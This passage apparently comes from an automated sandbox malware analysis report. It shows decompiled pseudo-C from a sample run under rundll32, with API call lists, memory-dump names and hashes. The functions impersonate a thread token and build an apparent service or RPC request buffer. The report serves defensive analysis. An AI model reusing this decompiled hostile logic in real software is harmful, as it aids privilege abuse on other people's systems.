                                                                                                                                                              • ResumeThread.KERNEL32(?,?,04E2A15C,?,?), ref: 04E2991C
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,04E2A15C,?,?), ref: 04E2992C
                                                                                                                                                              • GetLastError.KERNEL32(?,04E2A15C,?,?), ref: 04E29934
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,04E2A15C,?,?), ref: 04E2993D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 298440786-0
                                                                                                                                                              • Opcode ID: 8df26e0dec3cb4526ecb7a99c4d9661272cf436db5d9dd72828fe96e7381616f
                                                                                                                                                              • Instruction ID: 4ac57f0a738a4d4ceccd2f6c8ee8439b79fbf953d628bc0007b404797eb0362b
                                                                                                                                                              • Opcode Fuzzy Hash: 8df26e0dec3cb4526ecb7a99c4d9661272cf436db5d9dd72828fe96e7381616f
                                                                                                                                                              • Instruction Fuzzy Hash: 99214FB2A00229FFDB10AFA9DE8489EB7B9EF48325F105565E611F3155D734AE048F50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2A3B1(void* __ecx, void* _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				long _t18;
                                                                                                                                                              
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t18 = 0;
                                                                                                                                                              				_t9 = CreateThread(0, 0, E04E2A016, 0, 4, 0);
                                                                                                                                                              				_v8 = _t9;
                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                              					_t18 = 0x57;
                                                                                                                                                              				} else {
                                                                                                                                                              					if(SetThreadToken( &_v8, _a4) == 0) {
                                                                                                                                                              						_t18 = GetLastError();
                                                                                                                                                              						goto L5;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                              							L5:
                                                                                                                                                              							CloseHandle(_v8);
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				SetLastError(_t18);
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}






                                                                                                                                                              0x04e2a3c4
                                                                                                                                                              0x04e2a3c7
                                                                                                                                                              0x04e2a3c9
                                                                                                                                                              0x04e2a3cf
                                                                                                                                                              0x04e2a3d4
                                                                                                                                                              0x04e2a40f
                                                                                                                                                              0x04e2a3d6
                                                                                                                                                              0x04e2a3e5
                                                                                                                                                              0x04e2a3fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a3e7
                                                                                                                                                              0x04e2a3f3
                                                                                                                                                              0x04e2a3ff
                                                                                                                                                              0x04e2a402
                                                                                                                                                              0x04e2a408
                                                                                                                                                              0x04e2a408
                                                                                                                                                              0x04e2a3f3
                                                                                                                                                              0x04e2a3e5
                                                                                                                                                              0x04e2a411
                                                                                                                                                              0x04e2a41d

                                                                                                                                                              APIs
                                                                                                                                                              • CreateThread.KERNEL32 ref: 04E2A3C9
                                                                                                                                                              • SetThreadToken.ADVAPI32(?,?,?,?,04E27B43,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E2A3DD
                                                                                                                                                              • ResumeThread.KERNEL32(?,?,?,04E27B43,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E2A3EA
                                                                                                                                                              • GetLastError.KERNEL32(?,?,04E27B43,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E2A3F7
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,04E27B43,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E2A402
                                                                                                                                                              • SetLastError.KERNEL32(00000057,?,?,04E27B43,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E2A411
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2435877492-0
                                                                                                                                                              • Opcode ID: 761479c09365db5088d69f733ba2bcaf7fae378c942bd7258009c5bc34e9de98
                                                                                                                                                              • Instruction ID: a46a85a9a31a8aeda22a37202e6f3b4d3506be99d61005934a291ee401df164e
                                                                                                                                                              • Opcode Fuzzy Hash: 761479c09365db5088d69f733ba2bcaf7fae378c942bd7258009c5bc34e9de98
                                                                                                                                                              • Instruction Fuzzy Hash: 3D014B31A01128FBDB219F62EE0CDAF7E78EB85766B100121F605E2150D775AE41EAA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2796E(void* __ecx, void* _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void _v12;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              
                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                              				_t12 = CreateThread(0, 0, E04E27957,  &_v12, 4, 0);
                                                                                                                                                              				_v8 = _t12;
                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                              					if(SetThreadToken( &_v8, _a4) != 0) {
                                                                                                                                                              						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                              							GetLastError();
                                                                                                                                                              						} else {
                                                                                                                                                              							WaitForSingleObject(_v8, 0xffffffff);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					CloseHandle(_v8);
                                                                                                                                                              				}
                                                                                                                                                              				return _v12;
                                                                                                                                                              			}






                                                                                                                                                              0x04e27973
                                                                                                                                                              0x04e27988
                                                                                                                                                              0x04e2798e
                                                                                                                                                              0x04e27993
                                                                                                                                                              0x04e279a4
                                                                                                                                                              0x04e279b2
                                                                                                                                                              0x04e279c1
                                                                                                                                                              0x04e279b4
                                                                                                                                                              0x04e279b9
                                                                                                                                                              0x04e279b9
                                                                                                                                                              0x04e279b2
                                                                                                                                                              0x04e279ca
                                                                                                                                                              0x04e279ca
                                                                                                                                                              0x04e279d4

                                                                                                                                                              APIs
                                                                                                                                                              • CreateThread.KERNEL32 ref: 04E27988
                                                                                                                                                              • SetThreadToken.ADVAPI32(?,00000000,?,?,?,04E27B4A,?,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E2799C
                                                                                                                                                              • ResumeThread.KERNEL32(?,?,?,?,04E27B4A,?,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E279A9
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,04E27B4A,?,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E279B9
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,04E27B4A,?,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E279C1
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,04E27B4A,?,?,?,00000004,04E2787C,00000000,000000FF), ref: 04E279CA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1168161173-0
                                                                                                                                                              • Opcode ID: b9507d384bc434c003b16aa8e92cb1af9ae968c18deb65e82c713d54168d1335
                                                                                                                                                              • Instruction ID: 34ef6221834ae2e9768acfb7385690ec51bcd87d22b1bd4c783e139b4603f246
                                                                                                                                                              • Opcode Fuzzy Hash: b9507d384bc434c003b16aa8e92cb1af9ae968c18deb65e82c713d54168d1335
                                                                                                                                                              • Instruction Fuzzy Hash: 2AF04F7150021AFBEF219BA1DE0AF9D7B78EB04316F200254F611E10E0DB76EE009B14
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E24B5D(intOrPtr* __eax, void* _a4, signed char _a7, intOrPtr* _a8, signed int* _a12, signed short* _a16) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr* _t120;
                                                                                                                                                              				intOrPtr* _t122;
                                                                                                                                                              				intOrPtr* _t124;
                                                                                                                                                              				intOrPtr* _t126;
                                                                                                                                                              				intOrPtr* _t128;
                                                                                                                                                              				intOrPtr* _t130;
                                                                                                                                                              				signed short _t136;
                                                                                                                                                              				void* _t139;
                                                                                                                                                              				void* _t141;
                                                                                                                                                              				signed char _t143;
                                                                                                                                                              				signed short _t145;
                                                                                                                                                              				intOrPtr* _t147;
                                                                                                                                                              				intOrPtr* _t150;
                                                                                                                                                              				intOrPtr* _t153;
                                                                                                                                                              				signed char _t156;
                                                                                                                                                              				intOrPtr* _t160;
                                                                                                                                                              				intOrPtr* _t163;
                                                                                                                                                              				intOrPtr* _t166;
                                                                                                                                                              				signed char _t169;
                                                                                                                                                              				signed short _t171;
                                                                                                                                                              				intOrPtr* _t176;
                                                                                                                                                              				intOrPtr* _t182;
                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                              				signed char _t188;
                                                                                                                                                              				intOrPtr _t189;
                                                                                                                                                              				intOrPtr _t190;
                                                                                                                                                              				intOrPtr _t191;
                                                                                                                                                              				intOrPtr _t192;
                                                                                                                                                              				intOrPtr _t193;
                                                                                                                                                              				intOrPtr _t194;
                                                                                                                                                              				short _t202;
                                                                                                                                                              				signed int _t203;
                                                                                                                                                              				intOrPtr* _t205;
                                                                                                                                                              				intOrPtr* _t208;
                                                                                                                                                              				intOrPtr* _t211;
                                                                                                                                                              				intOrPtr _t214;
                                                                                                                                                              				intOrPtr _t216;
                                                                                                                                                              				intOrPtr _t218;
                                                                                                                                                              				intOrPtr _t219;
                                                                                                                                                              				intOrPtr _t221;
                                                                                                                                                              				intOrPtr _t223;
                                                                                                                                                              				signed int _t225;
                                                                                                                                                              				intOrPtr _t227;
                                                                                                                                                              				signed int _t228;
                                                                                                                                                              				intOrPtr _t230;
                                                                                                                                                              				intOrPtr* _t232;
                                                                                                                                                              				void* _t234;
                                                                                                                                                              				intOrPtr _t236;
                                                                                                                                                              				signed char _t237;
                                                                                                                                                              				intOrPtr _t238;
                                                                                                                                                              				signed char _t239;
                                                                                                                                                              				intOrPtr* _t240;
                                                                                                                                                              				signed int _t241;
                                                                                                                                                              				intOrPtr _t243;
                                                                                                                                                              				void* _t245;
                                                                                                                                                              				void* _t252;
                                                                                                                                                              				void* _t256;
                                                                                                                                                              				void* _t257;
                                                                                                                                                              				void* _t258;
                                                                                                                                                              				void* _t259;
                                                                                                                                                              				void* _t260;
                                                                                                                                                              				void* _t261;
                                                                                                                                                              				void* _t262;
                                                                                                                                                              				void* _t263;
                                                                                                                                                              				void* _t265;
                                                                                                                                                              				void* _t266;
                                                                                                                                                              				void* _t267;
                                                                                                                                                              				void* _t268;
                                                                                                                                                              				void* _t269;
                                                                                                                                                              				void* _t270;
                                                                                                                                                              				signed int _t276;
                                                                                                                                                              				void* _t278;
                                                                                                                                                              				void* _t279;
                                                                                                                                                              				void* _t280;
                                                                                                                                                              				signed int _t281;
                                                                                                                                                              				void* _t282;
                                                                                                                                                              
                                                                                                                                                              				_t187 = __eax;
                                                                                                                                                              				 *_a12 =  *_a12 & 0x00000000;
                                                                                                                                                              				_t120 = __eax;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t3 = _t120 + 1; // 0x1
                                                                                                                                                              				_t265 = _t3;
                                                                                                                                                              				do {
                                                                                                                                                              					_t189 =  *_t120;
                                                                                                                                                              					_t120 = _t120 + 1;
                                                                                                                                                              				} while (_t189 != 0);
                                                                                                                                                              				_v12 = _t120 - _t265;
                                                                                                                                                              				_t122 = __eax;
                                                                                                                                                              				_t5 = _t122 + 1; // 0x1
                                                                                                                                                              				_t266 = _t5;
                                                                                                                                                              				do {
                                                                                                                                                              					_t190 =  *_t122;
                                                                                                                                                              					_t122 = _t122 + 1;
                                                                                                                                                              				} while (_t190 != 0);
                                                                                                                                                              				_t245 = _t122 - _t266;
                                                                                                                                                              				_t124 = __eax;
                                                                                                                                                              				_t6 = _t124 + 1; // 0x1
                                                                                                                                                              				_t267 = _t6;
                                                                                                                                                              				do {
                                                                                                                                                              					_t191 =  *_t124;
                                                                                                                                                              					_t124 = _t124 + 1;
                                                                                                                                                              				} while (_t191 != 0);
                                                                                                                                                              				_v16 = _t124 - _t267;
                                                                                                                                                              				_t126 = __eax;
                                                                                                                                                              				_t8 = _t126 + 1; // 0x1
                                                                                                                                                              				_t268 = _t8;
                                                                                                                                                              				do {
                                                                                                                                                              					_t192 =  *_t126;
                                                                                                                                                              					_t126 = _t126 + 1;
                                                                                                                                                              				} while (_t192 != 0);
                                                                                                                                                              				_t234 = _t126 - _t268;
                                                                                                                                                              				_t128 = _a8;
                                                                                                                                                              				_t10 = _t128 + 1; // 0x1
                                                                                                                                                              				_t269 = _t10;
                                                                                                                                                              				do {
                                                                                                                                                              					_t193 =  *_t128;
                                                                                                                                                              					_t128 = _t128 + 1;
                                                                                                                                                              				} while (_t193 != 0);
                                                                                                                                                              				_v20 = _t128 - _t269;
                                                                                                                                                              				_t130 = _a8;
                                                                                                                                                              				_t13 = _t130 + 1; // 0x1
                                                                                                                                                              				_t270 = _t13;
                                                                                                                                                              				do {
                                                                                                                                                              					_t194 =  *_t130;
                                                                                                                                                              					_t130 = _t130 + 1;
                                                                                                                                                              				} while (_t194 != 0);
                                                                                                                                                              				_t20 = (_v12 + _v16 + _v20) * 2; // 0x10088
                                                                                                                                                              				_t136 = (0x0000fffe - _t245 + _t245 & 0x00000003) + (0x0000fffe - _t234 + _t234 & 0x00000003) + (0x0000fffe - _t130 - _t270 + _t130 - _t270 & 0x00000003) + _t20 + 0x8a;
                                                                                                                                                              				 *_a16 = _t136;
                                                                                                                                                              				_t139 = HeapAlloc(GetProcessHeap(), 8, _t136 & 0x0000ffff);
                                                                                                                                                              				 *_a12 = _t139;
                                                                                                                                                              				if(_t139 != 0) {
                                                                                                                                                              					_t276 = 0;
                                                                                                                                                              					_t252 = 0x18;
                                                                                                                                                              					do {
                                                                                                                                                              						_t23 = _t276 + 0x4e33730; // 0xfcfffffa
                                                                                                                                                              						 *(_t276 + _t139) =  !( *_t23);
                                                                                                                                                              						_t276 = _t276 + 1;
                                                                                                                                                              						_t252 = _t252 - 1;
                                                                                                                                                              					} while (_t252 != 0);
                                                                                                                                                              					_t202 = 0xc;
                                                                                                                                                              					 *(_t139 + 0xc) = 2;
                                                                                                                                                              					 *((short*)(_t139 + 0x16)) = _t202;
                                                                                                                                                              					_t28 = _t139 + 0x18; // 0x18
                                                                                                                                                              					_t203 = 5;
                                                                                                                                                              					_t141 = memcpy(_t28, _a4, _t203 << 2);
                                                                                                                                                              					_t205 = _t187;
                                                                                                                                                              					_t30 = _t205 + 1; // 0x1
                                                                                                                                                              					_t278 = _t30;
                                                                                                                                                              					do {
                                                                                                                                                              						_t236 =  *_t205;
                                                                                                                                                              						_t205 = _t205 + 1;
                                                                                                                                                              					} while (_t236 != 0);
                                                                                                                                                              					 *((intOrPtr*)(_t141 + 0x2c)) = _t205 - _t278 + 1;
                                                                                                                                                              					_t208 = _t187;
                                                                                                                                                              					_t32 = _t208 + 1; // 0x1
                                                                                                                                                              					_t279 = _t32;
                                                                                                                                                              					do {
                                                                                                                                                              						_t237 =  *_t208;
                                                                                                                                                              						_t208 = _t208 + 1;
                                                                                                                                                              					} while (_t237 != 0);
                                                                                                                                                              					 *((intOrPtr*)(_t141 + 0x34)) = _t208 - _t279 + 1;
                                                                                                                                                              					_t211 = _t187;
                                                                                                                                                              					_v12 = 0x38;
                                                                                                                                                              					_a7 = _t237;
                                                                                                                                                              					_t36 = _t211 + 1; // 0x1
                                                                                                                                                              					_t280 = _t36;
                                                                                                                                                              					do {
                                                                                                                                                              						_t238 =  *_t211;
                                                                                                                                                              						_t211 = _t211 + 1;
                                                                                                                                                              					} while (_t238 != 0);
                                                                                                                                                              					if(_t211 != _t280) {
                                                                                                                                                              						_t241 = 0;
                                                                                                                                                              						do {
                                                                                                                                                              							_v12 = _v12 + 2;
                                                                                                                                                              							_a7 = _a7 + 1;
                                                                                                                                                              							 *((char*)(_t141 + (_v12 & 0x0000ffff))) =  *((intOrPtr*)(_t241 + _t187));
                                                                                                                                                              							_t232 = _t187;
                                                                                                                                                              							_t44 = _t232 + 1; // 0x1
                                                                                                                                                              							_t282 = _t44;
                                                                                                                                                              							do {
                                                                                                                                                              								_t243 =  *_t232;
                                                                                                                                                              								_t232 = _t232 + 1;
                                                                                                                                                              							} while (_t243 != 0);
                                                                                                                                                              							_t241 = _a7 & 0x000000ff;
                                                                                                                                                              						} while (_t241 < _t232 - _t282);
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v12 + 2;
                                                                                                                                                              					_t143 = _v12 & 3;
                                                                                                                                                              					if(_t143 < 0) {
                                                                                                                                                              						_t143 = (_t143 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t143 != 0) {
                                                                                                                                                              						_v12 = _v12 + (_t143 & 0x000000ff);
                                                                                                                                                              					}
                                                                                                                                                              					_t281 =  *_a12;
                                                                                                                                                              					_t145 = rand();
                                                                                                                                                              					_v12 = _v12 + 4;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = _t145 & 0x0000ffff;
                                                                                                                                                              					_t147 = _t187;
                                                                                                                                                              					_t56 = _t147 + 1; // 0x1
                                                                                                                                                              					_t256 = _t56;
                                                                                                                                                              					do {
                                                                                                                                                              						_t214 =  *_t147;
                                                                                                                                                              						_t147 = _t147 + 1;
                                                                                                                                                              					} while (_t214 != 0);
                                                                                                                                                              					_v12 = _v12 + 8;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = _t147 - _t256 + 1;
                                                                                                                                                              					_t150 = _t187;
                                                                                                                                                              					_t61 = _t150 + 1; // 0x1
                                                                                                                                                              					_t257 = _t61;
                                                                                                                                                              					do {
                                                                                                                                                              						_t216 =  *_t150;
                                                                                                                                                              						_t150 = _t150 + 1;
                                                                                                                                                              					} while (_t216 != 0);
                                                                                                                                                              					_v12 = _v12 + 4;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = _t150 - _t257 + 1;
                                                                                                                                                              					_t153 = _t187;
                                                                                                                                                              					_t239 = 0;
                                                                                                                                                              					_t66 = _t153 + 1; // 0x1
                                                                                                                                                              					_t258 = _t66;
                                                                                                                                                              					do {
                                                                                                                                                              						_t218 =  *_t153;
                                                                                                                                                              						_t153 = _t153 + 1;
                                                                                                                                                              					} while (_t218 != 0);
                                                                                                                                                              					if(_t153 != _t258) {
                                                                                                                                                              						_t228 = 0;
                                                                                                                                                              						do {
                                                                                                                                                              							_v12 = _v12 + 2;
                                                                                                                                                              							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t228 + _t187));
                                                                                                                                                              							_t182 = _t187;
                                                                                                                                                              							_t239 = _t239 + 1;
                                                                                                                                                              							_t72 = _t182 + 1; // 0x1
                                                                                                                                                              							_t263 = _t72;
                                                                                                                                                              							do {
                                                                                                                                                              								_t230 =  *_t182;
                                                                                                                                                              								_t182 = _t182 + 1;
                                                                                                                                                              							} while (_t230 != 0);
                                                                                                                                                              							_t228 = _t239 & 0x000000ff;
                                                                                                                                                              						} while (_t228 < _t182 - _t263);
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v12 + 2;
                                                                                                                                                              					_t156 = _v12 & 3;
                                                                                                                                                              					if(_t156 < 0) {
                                                                                                                                                              						_t156 = (_t156 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t156 != 0) {
                                                                                                                                                              						_v12 = _v12 + (_t156 & 0x000000ff);
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v12 + 4;
                                                                                                                                                              					_t240 = _a8;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = 0xf01ff;
                                                                                                                                                              					_v12 = _v12 + 4;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = 0x10;
                                                                                                                                                              					_v12 = _v12 + 8;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = 2;
                                                                                                                                                              					_t160 = _t240;
                                                                                                                                                              					_t259 = _t160 + 1;
                                                                                                                                                              					do {
                                                                                                                                                              						_t219 =  *_t160;
                                                                                                                                                              						_t160 = _t160 + 1;
                                                                                                                                                              					} while (_t219 != 0);
                                                                                                                                                              					_v12 = _v12 + 8;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = _t160 - _t259 + 1;
                                                                                                                                                              					_t163 = _t240;
                                                                                                                                                              					_t260 = _t163 + 1;
                                                                                                                                                              					do {
                                                                                                                                                              						_t221 =  *_t163;
                                                                                                                                                              						_t163 = _t163 + 1;
                                                                                                                                                              					} while (_t221 != 0);
                                                                                                                                                              					_v12 = _v12 + 4;
                                                                                                                                                              					 *((_v12 & 0x0000ffff) + _t281) = _t163 - _t260 + 1;
                                                                                                                                                              					_t166 = _t240;
                                                                                                                                                              					_t188 = 0;
                                                                                                                                                              					_t261 = _t166 + 1;
                                                                                                                                                              					do {
                                                                                                                                                              						_t223 =  *_t166;
                                                                                                                                                              						_t166 = _t166 + 1;
                                                                                                                                                              					} while (_t223 != 0);
                                                                                                                                                              					if(_t166 != _t261) {
                                                                                                                                                              						_t225 = 0;
                                                                                                                                                              						do {
                                                                                                                                                              							_v12 = _v12 + 2;
                                                                                                                                                              							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t225 + _t240));
                                                                                                                                                              							_t176 = _t240;
                                                                                                                                                              							_t188 = _t188 + 1;
                                                                                                                                                              							_t262 = _t176 + 1;
                                                                                                                                                              							do {
                                                                                                                                                              								_t227 =  *_t176;
                                                                                                                                                              								_t176 = _t176 + 1;
                                                                                                                                                              							} while (_t227 != 0);
                                                                                                                                                              							_t225 = _t188 & 0x000000ff;
                                                                                                                                                              						} while (_t225 < _t176 - _t262);
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v12 + 2;
                                                                                                                                                              					_t169 = _v12 & 3;
                                                                                                                                                              					if(_t169 < 0) {
                                                                                                                                                              						_t169 = (_t169 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t169 != 0) {
                                                                                                                                                              						_v12 = _v12 + (_t169 & 0x000000ff);
                                                                                                                                                              					}
                                                                                                                                                              					_t171 = _v12 + 0x1c;
                                                                                                                                                              					 *_a16 = _t171;
                                                                                                                                                              					 *(_t281 + 8) = _t171;
                                                                                                                                                              					_v5 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}



















































































                                                                                                                                                              0x04e24b64
                                                                                                                                                              0x04e24b69
                                                                                                                                                              0x04e24b6d
                                                                                                                                                              0x04e24b70
                                                                                                                                                              0x04e24b74
                                                                                                                                                              0x04e24b74
                                                                                                                                                              0x04e24b77
                                                                                                                                                              0x04e24b77
                                                                                                                                                              0x04e24b79
                                                                                                                                                              0x04e24b7a
                                                                                                                                                              0x04e24b80
                                                                                                                                                              0x04e24b83
                                                                                                                                                              0x04e24b85
                                                                                                                                                              0x04e24b85
                                                                                                                                                              0x04e24b88
                                                                                                                                                              0x04e24b88
                                                                                                                                                              0x04e24b8a
                                                                                                                                                              0x04e24b8b
                                                                                                                                                              0x04e24b91
                                                                                                                                                              0x04e24b93
                                                                                                                                                              0x04e24b95
                                                                                                                                                              0x04e24b95
                                                                                                                                                              0x04e24b98
                                                                                                                                                              0x04e24b98
                                                                                                                                                              0x04e24b9a
                                                                                                                                                              0x04e24b9b
                                                                                                                                                              0x04e24ba1
                                                                                                                                                              0x04e24ba4
                                                                                                                                                              0x04e24ba6
                                                                                                                                                              0x04e24ba6
                                                                                                                                                              0x04e24ba9
                                                                                                                                                              0x04e24ba9
                                                                                                                                                              0x04e24bab
                                                                                                                                                              0x04e24bac
                                                                                                                                                              0x04e24bb2
                                                                                                                                                              0x04e24bb4
                                                                                                                                                              0x04e24bb7
                                                                                                                                                              0x04e24bb7
                                                                                                                                                              0x04e24bba
                                                                                                                                                              0x04e24bba
                                                                                                                                                              0x04e24bbc
                                                                                                                                                              0x04e24bbd
                                                                                                                                                              0x04e24bc3
                                                                                                                                                              0x04e24bc6
                                                                                                                                                              0x04e24bc9
                                                                                                                                                              0x04e24bc9
                                                                                                                                                              0x04e24bcc
                                                                                                                                                              0x04e24bcc
                                                                                                                                                              0x04e24bce
                                                                                                                                                              0x04e24bcf
                                                                                                                                                              0x04e24c04
                                                                                                                                                              0x04e24c04
                                                                                                                                                              0x04e24c0b
                                                                                                                                                              0x04e24c1b
                                                                                                                                                              0x04e24c24
                                                                                                                                                              0x04e24c28
                                                                                                                                                              0x04e24c30
                                                                                                                                                              0x04e24c32
                                                                                                                                                              0x04e24c33
                                                                                                                                                              0x04e24c33
                                                                                                                                                              0x04e24c3b
                                                                                                                                                              0x04e24c3e
                                                                                                                                                              0x04e24c3f
                                                                                                                                                              0x04e24c3f
                                                                                                                                                              0x04e24c47
                                                                                                                                                              0x04e24c48
                                                                                                                                                              0x04e24c4f
                                                                                                                                                              0x04e24c55
                                                                                                                                                              0x04e24c58
                                                                                                                                                              0x04e24c59
                                                                                                                                                              0x04e24c5b
                                                                                                                                                              0x04e24c5d
                                                                                                                                                              0x04e24c5d
                                                                                                                                                              0x04e24c60
                                                                                                                                                              0x04e24c60
                                                                                                                                                              0x04e24c62
                                                                                                                                                              0x04e24c63
                                                                                                                                                              0x04e24c6a
                                                                                                                                                              0x04e24c6d
                                                                                                                                                              0x04e24c6f
                                                                                                                                                              0x04e24c6f
                                                                                                                                                              0x04e24c72
                                                                                                                                                              0x04e24c72
                                                                                                                                                              0x04e24c74
                                                                                                                                                              0x04e24c75
                                                                                                                                                              0x04e24c7c
                                                                                                                                                              0x04e24c7f
                                                                                                                                                              0x04e24c81
                                                                                                                                                              0x04e24c88
                                                                                                                                                              0x04e24c8b
                                                                                                                                                              0x04e24c8b
                                                                                                                                                              0x04e24c8e
                                                                                                                                                              0x04e24c8e
                                                                                                                                                              0x04e24c90
                                                                                                                                                              0x04e24c91
                                                                                                                                                              0x04e24c97
                                                                                                                                                              0x04e24c99
                                                                                                                                                              0x04e24c9b
                                                                                                                                                              0x04e24ca2
                                                                                                                                                              0x04e24ca6
                                                                                                                                                              0x04e24ca9
                                                                                                                                                              0x04e24cac
                                                                                                                                                              0x04e24cae
                                                                                                                                                              0x04e24cae
                                                                                                                                                              0x04e24cb1
                                                                                                                                                              0x04e24cb1
                                                                                                                                                              0x04e24cb3
                                                                                                                                                              0x04e24cb4
                                                                                                                                                              0x04e24cb8
                                                                                                                                                              0x04e24cbe
                                                                                                                                                              0x04e24c9b
                                                                                                                                                              0x04e24cc2
                                                                                                                                                              0x04e24cca
                                                                                                                                                              0x04e24ccf
                                                                                                                                                              0x04e24cd5
                                                                                                                                                              0x04e24cd5
                                                                                                                                                              0x04e24cd8
                                                                                                                                                              0x04e24cdd
                                                                                                                                                              0x04e24cdd
                                                                                                                                                              0x04e24ce4
                                                                                                                                                              0x04e24ce6
